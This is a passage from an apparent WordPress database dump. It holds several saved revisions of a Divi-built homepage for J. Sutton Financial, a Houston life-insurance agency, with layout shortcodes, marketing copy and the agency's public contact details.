global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 13:35:26','2023-04-03 13:35:26','',138,'http://cmdev-site1.com/?p=675',0,'revision','',0),(671,3,'2023-04-03 12:37:55','2023-04-03 12:37:55','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\" custom_margin=\"||152px|||\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2>Want to know how much insurance you need?</h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 12:37:55','2023-04-03 12:37:55','',138,'http://cmdev-site1.com/?p=671',0,'revision','',0),(674,3,'2023-04-03 12:46:57','2023-04-03 12:46:57','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2>Want to know how much insurance you need?</h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 12:46:57','2023-04-03 12:46:57','',138,'http://cmdev-site1.com/?p=674',0,'revision','',0),(684,1,'2023-04-03 23:00:12','2023-04-03 23:00:12','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" custom_margin=\"-11px|||||\" custom_padding=\"364px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"1px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" 